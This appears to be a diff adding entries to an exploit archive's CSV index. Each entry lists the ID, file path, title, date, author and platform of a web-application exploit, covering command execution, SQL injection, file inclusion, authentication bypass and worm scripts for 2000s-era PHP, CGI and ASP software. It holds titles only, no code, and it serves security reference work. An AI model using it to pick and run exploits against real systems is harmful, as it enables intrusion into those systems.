+188,exploits/cgi/webapps/188.pl,"UtilMind Mail List 1.7 - Users Can Execute Commands",2000-11-17,teleh0r,webapps,cgi, +242,exploits/cgi/webapps/242.pl,"Fastgraf's whois.cgi - Remote Command Execution",2001-01-12,"Marco van Berkum",webapps,cgi, +289,exploits/cgi/webapps/289.pl,"sendtemp.pl - Read Access to Files",2001-03-04,"Tom Parker",webapps,cgi, +309,exploits/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",webapps,php, +384,exploits/php/webapps/384.txt,"PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,webapps,php, +406,exploits/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",webapps,php, +407,exploits/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution",2004-08-21,"Johnathan Bat",webapps,cgi, +430,exploits/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,webapps,php, +436,exploits/php/webapps/436.txt,"PHP-Nuke 7.4 - Privilege Escalation",2004-09-08,mantra,webapps,php, +464,exploits/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,webapps,cgi, +465,exploits/php/webapps/465.pl,"PHP-Nuke - SQL Injection Edit/Save Messages",2004-09-16,iko94,webapps,php, +561,exploits/php/webapps/561.sh,"S9Y Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,webapps,php, +565,exploits/php/webapps/565.txt,"Silent Storm Portal - Multiple Vulnerabilities",2004-09-30,"CHT Security Research",webapps,php, +570,exploits/php/webapps/570.txt,"WordPress 1.2 - HTTP Splitting",2004-10-10,"Tenable NS",webapps,php, +574,exploits/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,webapps,php, +630,exploits/php/webapps/630.pl,"UBBCentral UBB.Threads 6.2.x < 6.3x - One Char Brute Force",2004-11-15,RusH,webapps,php, +631,exploits/php/webapps/631.txt,"vBulletin - 'LAST.php' SQL Injection",2004-11-15,anonymous,webapps,php, +635,exploits/php/webapps/635.txt,"MiniBB 1.7f - 'user' SQL Injection",2004-11-16,anonymous,webapps,php, +642,exploits/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,webapps,cgi, +645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php, +647,exploits/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution",2004-11-22,RusH,webapps,php, +648,exploits/php/webapps/648.pl,"Invision Power Board 2.0.0 < 2.0.2 - SQL Injection",2004-11-22,RusH,webapps,php, +659,exploits/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",webapps,cgi, +673,exploits/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,webapps,php, +676,exploits/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Code Execution",2004-12-05,evilrabbi,webapps,php, +697,exploits/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Information Leak",2004-12-17,overdose,webapps,php, +702,exploits/php/webapps/702.pl,"phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload",2004-12-22,anonymous,webapps,php, +703,exploits/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions",2004-12-22,sysbug,webapps,php, +704,exploits/php/webapps/704.pl,"e107 - 'include()' Remote File Upload",2004-12-22,sysbug,webapps,php,80 +720,exploits/php/webapps/720.pl,"Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,webapps,php, +725,exploits/php/webapps/725.pl,"PHPInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,webapps,php, +737,exploits/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,webapps,php, +740,exploits/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",webapps,php, +754,exploits/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,webapps,php, +772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi, +773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi, +774,exploits/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",webapps,php, +786,exploits/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,webapps,php, +790,exploits/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,webapps,cgi, +800,exploits/php/webapps/800.txt,"PostNuke PostWrap Module - Remote File Inclusion / Code Execution",2005-02-08,"ALBANIA SECURITY",webapps,php, +801,exploits/php/webapps/801.c,"PHP-Nuke 7.4 - Admin",2005-02-09,Silentium,webapps,php, +807,exploits/php/webapps/807.txt,"MyPHP Forum 1.0 - SQL Injection",2005-02-10,GHC,webapps,php, +808,exploits/php/webapps/808.txt,"CMScore - SQL Injection",2005-02-10,GHC,webapps,php, +809,exploits/php/webapps/809.txt,"Chipmunk Forums - SQL Injection",2005-02-10,GHC,webapps,php, +814,exploits/php/webapps/814.txt,"MercuryBoard 1.1.1 - SQL Injection",2005-02-12,Zeelock,webapps,php, +818,exploits/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,webapps,php, +820,exploits/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,webapps,php, +832,exploits/php/webapps/832.txt,"vBulletin 3.0.6 - PHP Code Injection",2005-02-22,pokley,webapps,php, +840,exploits/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote s (PoC)",2005-02-24,Silentium,webapps,cgi, +853,exploits/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote s",2005-03-02,omin0us,webapps,cgi, +857,exploits/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",webapps,php, +858,exploits/php/webapps/858.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,webapps,php, +860,exploits/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper",2005-03-07,sirius_black,webapps,php, +862,exploits/cgi/webapps/862.txt,"The Includer CGI 1.0 - Remote Command Execution (1)",2005-03-07,"Francisco Alisson",webapps,cgi, +864,exploits/php/webapps/864.txt,"phpWebLog 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",webapps,php, +865,exploits/php/webapps/865.txt,"PHP mcNews 1.3 - 'skinfile' Remote File Inclusion",2005-03-07,"Filip Groszynski",webapps,php, +866,exploits/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection",2005-03-08,Silentium,webapps,php, +870,exploits/php/webapps/870.txt,"Download Center Lite (DCL) 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",webapps,php, +871,exploits/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass",2005-03-11,Ali7,webapps,php, +872,exploits/php/webapps/872.pl,"SocialMPN - Arbitrary File Injection",2005-03-11,y3dips,webapps,php, +873,exploits/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,webapps,php, +881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php, +889,exploits/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,webapps,php, +892,exploits/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,webapps,php, +897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,webapps,php, +901,exploits/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,webapps,php, +907,exploits/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Get Hash",2005-04-02,CereBrums,webapps,php, +910,exploits/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Get Hash",2005-04-04,CereBrums,webapps,php, +921,exploits/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection",2005-04-07,"Fabrizi Andrea",webapps,php, +922,exploits/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,webapps,cgi, +30090,exploits/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",webapps,php, +923,exploits/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,webapps,cgi, +925,exploits/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,webapps,asp, +928,exploits/php/webapps/928.py,"PunBB 1.2.4 - 'id' SQL Injection",2005-04-11,"Stefan Esser",webapps,php, +939,exploits/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - 'exit.php' SQL Injection",2005-04-13,kre0n,webapps,php, +954,exploits/cgi/webapps/954.pl,"E-Cart 1.1 - 'index.cgi' Remote Command Execution",2005-04-25,z,webapps,cgi, +980,exploits/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",webapps,cgi, +982,exploits/php/webapps/982.c,"ZeroBoard - Worm Source Code",2005-05-06,anonymous,webapps,php, +989,exploits/php/webapps/989.pl,"PhotoPost - Arbitrary Data Hash",2005-05-13,basher13,webapps,php, +996,exploits/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,webapps,php, +1003,exploits/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution",2005-05-20,Silentium,webapps,php, +1004,exploits/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,webapps,cgi, +1005,exploits/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,webapps,cgi, +1006,exploits/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - 'register.php' SQL Injection",2005-05-20,deluxe89,webapps,php, +1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl)",2005-05-26,Alpha_Programmer,webapps,asp, +1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,webapps,asp, +1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp, +1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php, +1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-27,"Danica Jones",webapps,php, +1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp, +1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php, +1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php, +1018,exploits/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (2)",2005-05-30,Nikyt0x,webapps,php, +1020,exploits/php/webapps/1020.c,"ZeroBoard 4.1 - 'preg_replace' Remote Nobody Shell",2005-05-31,n0gada,webapps,php, +1022,exploits/php/webapps/1022.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'calendar.php' SQL Injection",2005-05-31,"Alberto Trivero",webapps,php, +1023,exploits/php/webapps/1023.pl,"MyBloggie 2.1.1 < 2.1.2 - SQL Injection",2005-05-31,"Alberto Trivero",webapps,php, +1030,exploits/php/webapps/1030.pl,"PostNuke 0.750 - 'readpmsg.php' SQL Injection",2005-06-05,K-C0d3r,webapps,php, +1031,exploits/php/webapps/1031.pl,"Portail PHP < 1.3 - SQL Injection",2005-06-06,"Alberto Trivero",webapps,php, +1033,exploits/php/webapps/1033.pl,"WordPress 1.5.1.1 - SQL Injection",2005-06-22,"Alberto Trivero",webapps,php, +1036,exploits/php/webapps/1036.php,"Invision Power Board 1.3.1 - 'login.php' SQL Injection",2005-06-08,anonymous,webapps,php, +1039,exploits/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution (Perl) (1)",2005-06-11,Alpha_Programmer,webapps,cgi, +1040,exploits/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution (C) (2)",2005-06-11,Alpha_Programmer,webapps,cgi, +1041,exploits/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution (Perl) (3)",2005-06-11,MadSheep,webapps,cgi, +1048,exploits/cgi/webapps/1048.pl,"eXtropia Shopping Cart - 'web_store.cgi' Remote Command Execution",2005-06-15,"Action Spider",webapps,cgi, +1049,exploits/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash",2005-06-15,pokleyzz,webapps,php, +1050,exploits/php/webapps/1050.pl,"PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password",2005-06-15,Alpha_Programmer,webapps,php, +1051,exploits/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",webapps,php, +1052,exploits/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,webapps,php, +1053,exploits/php/webapps/1053.pl,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)",2005-06-19,K-C0d3r,webapps,php, +1057,exploits/php/webapps/1057.pl,"Simple Machines Forum (SMF) 1.0.4 - 'modify' SQL Injection",2005-06-21,"James Bercegay",webapps,php, +1058,exploits/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection",2005-06-21,RusH,webapps,php, +1059,exploits/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,webapps,php, +1060,exploits/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution",2005-06-21,RusH,webapps,php, +1061,exploits/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection",2005-06-21,RusH,webapps,php, +1062,exploits/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution",2005-06-22,"Alberto Trivero",webapps,php, +1068,exploits/php/webapps/1068.pl,"PHP-Fusion 6.00.105 - Accessible Database Backups Download",2005-06-25,Easyex,webapps,php, +1069,exploits/php/webapps/1069.php,"UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection",2005-06-25,mh_p0rtal,webapps,php, +1070,exploits/asp/webapps/1070.pl,"ASPNuke 0.80 - 'article.asp' SQL Injection",2005-06-27,mh_p0rtal,webapps,asp, +1071,exploits/asp/webapps/1071.pl,"ASPNuke 0.80 - 'comment_post.asp' SQL Injection",2005-06-27,"Alberto Trivero",webapps,asp, +1076,exploits/php/webapps/1076.py,"phpBB 2.0.15 - 'highlight' PHP Remote Code Execution",2005-06-29,rattle,webapps,php, +1077,exploits/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",webapps,php, +1078,exploits/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,webapps,php, +1080,exploits/php/webapps/1080.pl,"phpBB 2.0.15 - 'highlight' Database Authentication Details",2005-07-03,SecureD,webapps,php, +1082,exploits/php/webapps/1082.pl,"XOOPS 2.0.11 - 'xmlrpc.php' SQL Injection",2005-07-04,RusH,webapps,php, +1083,exploits/php/webapps/1083.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)",2005-07-04,dukenn,webapps,php, +1084,exploits/php/webapps/1084.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)",2005-07-04,"Mike Rifone",webapps,php, +1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php, +1095,exploits/php/webapps/1095.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-08,D|ablo,webapps,php, +1097,exploits/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure",2005-07-11,LazyCrs,webapps,php, +1103,exploits/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)",2005-07-13,"Sjaak Rake",webapps,php, +1106,exploits/php/webapps/1106.txt,"e107 0.617 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-14,warlord,webapps,php, +1111,exploits/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,webapps,php, +1112,exploits/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota",2005-07-18,"Soroush Dalili",webapps,asp, +1113,exploits/php/webapps/1113.pm,"phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)",2005-07-19,str0ke,webapps,php, +1120,exploits/cgi/webapps/1120.pl,"FtpLocate 2.02 - 'current' Remote Command Execution",2005-07-25,newbug,webapps,cgi, +1133,exploits/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution (Metasploit)",2005-08-03,str0ke,webapps,php, +1134,exploits/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"James Bercegay",webapps,php, +1135,exploits/php/webapps/1135.c,"PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection",2005-08-05,Easyex,webapps,php, +1140,exploits/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,webapps,php, +1142,exploits/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,webapps,php, +1145,exploits/php/webapps/1145.pm,"WordPress 1.5.1.3 - Remote Code Execution (Metasploit)",2005-08-10,str0ke,webapps,php, +1172,exploits/php/webapps/1172.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'search.php' SQL Injection",2005-08-22,Alpha_Programmer,webapps,php, +1189,exploits/php/webapps/1189.c,"vBulletin 3.0.8 - Accessible Database Backup Searcher (3)",2005-08-31,str0ke,webapps,php, +1191,exploits/php/webapps/1191.pl,"Simple PHP Blog 0.4.0 - Multiple Remote s",2005-09-01,"Kenneth Belva",webapps,php, +1194,exploits/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Executions (2)",2005-09-04,tracewar,webapps,cgi, +1200,exploits/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution (1)",2005-09-07,rgod,webapps,php, +1202,exploits/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution (2)",2005-09-07,RusH,webapps,php, +1207,exploits/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution",2005-09-09,rgod,webapps,php, +1208,exploits/php/webapps/1208.pl,"phpMyFamily 1.4.0 - SQL Injection",2005-03-27,basher13,webapps,php, +1211,exploits/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection",2005-09-11,Megabyte,webapps,php, +1214,exploits/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution",2005-09-13,rgod,webapps,php, +1217,exploits/php/webapps/1217.pl,"phpWebSite 0.10.0 - 'module' SQL Injection",2005-09-15,RusH,webapps,php, +1219,exploits/php/webapps/1219.c,"PHP-Nuke 7.8 - 'modules.php' SQL Injection",2005-09-16,RusH,webapps,php, +1221,exploits/php/webapps/1221.php,"CuteNews 1.4.0 - Shell Injection / Remote Command Execution",2005-09-17,rgod,webapps,php, +1225,exploits/php/webapps/1225.php,"My Little Forum 1.5 - 'SearchString' SQL Injection",2005-09-22,rgod,webapps,php, +1226,exploits/php/webapps/1226.php,"phpMyFAQ 1.5.1 - 'User-Agent' Remote Shell Injection",2005-09-23,rgod,webapps,php, +1227,exploits/php/webapps/1227.php,"MailGust 1.9 - Board Takeover SQL Injection",2005-09-24,rgod,webapps,php, +1236,exploits/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",webapps,cgi, +1237,exploits/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' SQL Injection",2005-09-28,rgod,webapps,php, +1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php, +1241,exploits/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover SQL Injection",2005-10-08,rgod,webapps,php, +1244,exploits/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,webapps,php, +1245,exploits/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection",2005-10-10,rgod,webapps,php, +1250,exploits/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,webapps,php, +1252,exploits/asp/webapps/1252.html,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,webapps,asp, +1270,exploits/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,webapps,php, +1273,exploits/php/webapps/1273.pl,"TClanPortal 1.1.3 - 'id' SQL Injection",2005-10-26,Devil-00,webapps,php, +1278,exploits/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution",2005-10-31,RusH,webapps,php, +1280,exploits/php/webapps/1280.pl,"VuBB Forum RC1 - 'm' SQL Injection",2005-11-02,Devil-00,webapps,php, +1289,exploits/php/webapps/1289.php,"CuteNews 1.4.1 - Shell Injection / Remote Command Execution",2005-11-03,rgod,webapps,php, +1296,exploits/php/webapps/1296.txt,"ibProArcade 2.x - module 'vBulletin/IPB' SQL Injection",2005-11-06,B~HFH,webapps,php, +1298,exploits/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,webapps,php, +1312,exploits/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution",2005-11-10,rgod,webapps,php, +1315,exploits/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,webapps,php, +1317,exploits/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL Injection",2005-11-13,DiGiTAL_MiDWAY,webapps,php, +1319,exploits/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,webapps,php, +1320,exploits/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,webapps,php, +1321,exploits/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php?id' SQL Injection",2005-11-14,"HACKERS PAL",webapps,php, +1322,exploits/php/webapps/1322.pl,"Wizz Forum 1.20 - 'TopicID' SQL Injection",2005-11-14,"HACKERS PAL",webapps,php, +1324,exploits/php/webapps/1324.php,"PHPWebThings 1.4 - 'msg'/'forum' SQL Injection",2005-11-16,rgod,webapps,php, +1325,exploits/php/webapps/1325.pl,"PHPWebThings 1.4 - 'forum' SQL Injection",2005-11-16,AhLam,webapps,php, +1326,exploits/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,webapps,php, +1329,exploits/php/webapps/1329.php,"EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution",2005-11-17,rgod,webapps,php, +1337,exploits/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,webapps,php, +1340,exploits/php/webapps/1340.php,"eFiction 2.0 - Fake '.GIF' Arbitrary File Upload",2005-11-25,rgod,webapps,php, +1342,exploits/php/webapps/1342.php,"Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution",2005-11-28,rgod,webapps,php, +1354,exploits/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,webapps,php, +1356,exploits/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,webapps,php, +1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution",2005-12-06,rgod,webapps,php, +1359,exploits/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,webapps,php, +1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution (C)",2005-12-07,unitedasia,webapps,php, +1363,exploits/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,webapps,php, +1364,exploits/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,webapps,php, +1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,webapps,php, +1370,exploits/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,webapps,php, +1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php, +1379,exploits/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,webapps,php, +1382,exploits/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary (2)",2006-02-20,DarkFig,webapps,php, +1383,exploits/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,webapps,php, +1385,exploits/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' SQL Injection",2005-12-23,krasza,webapps,php, +1387,exploits/php/webapps/1387.php,"Dev Web Management System 1.5 - 'cat' SQL Injection",2005-12-24,rgod,webapps,php, +1388,exploits/php/webapps/1388.pl,"phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command",2005-12-24,RusH,webapps,php, +1395,exploits/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution",2005-12-29,rgod,webapps,php, +1398,exploits/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution",2005-12-30,cijfer,webapps,php, +1399,exploits/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection",2005-12-30,DevilBox,webapps,asp, +1400,exploits/php/webapps/1400.pl,"CuteNews 1.4.1 - 'categories.mdu' Remote Command Execution",2006-01-01,cijfer,webapps,php, +1401,exploits/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution",2006-01-03,cijfer,webapps,php, +1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php, +1410,exploits/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change",2006-01-09,cijfer,webapps,php, +1418,exploits/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,webapps,asp, +1419,exploits/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' SQL Injection",2006-01-14,DetMyl,webapps,asp, +1442,exploits/php/webapps/1442.pl,"EZDatabase 2.0 - 'db_id' Remote Command Execution",2006-01-22,cijfer,webapps,php, +1446,exploits/php/webapps/1446.pl,"creLoaded 6.15 - 'HTMLAREA' Automated Perl",2006-01-24,kaneda,webapps,php, +1453,exploits/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - SQL Injection",2006-01-25,matrix_killer,webapps,php, +1457,exploits/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,webapps,php, +1459,exploits/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,webapps,php, +1461,exploits/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,webapps,php, +1467,exploits/php/webapps/1467.php,"LoudBlog 0.4 - Remote File Inclusion",2006-02-03,rgod,webapps,php, +1468,exploits/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,webapps,php, +1469,exploits/php/webapps/1469.pl,"phpBB 2.0.19 - Style Changer/Demo Mod SQL Injection",2006-02-05,SkOd,webapps,php, +1471,exploits/cgi/webapps/1471.pl,"MyQuiz 1.01 - 'PATH_INFO' Arbitrary Command Execution",2006-02-06,Hessam-x,webapps,cgi, +1472,exploits/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - 